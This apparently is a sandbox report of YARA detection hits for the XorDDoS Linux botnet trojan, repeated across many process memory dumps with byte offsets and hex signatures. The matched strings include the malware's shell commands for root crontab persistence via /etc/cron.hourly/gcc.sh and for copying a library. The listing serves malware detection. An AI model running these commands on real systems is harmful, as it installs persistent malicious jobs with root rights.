6559.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6559.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6559.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6559.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6378.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6378.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6378.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6378.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6378.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6378.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6378.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6293.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6293.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6293.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6293.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6293.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6293.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6293.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6223.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6223.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6223.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6223.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6223.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6223.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6223.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6471.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6471.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6471.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6471.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6471.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6471.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6471.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6449.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6449.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6449.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6449.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6449.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6449.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6449.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6224.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6224.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6224.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
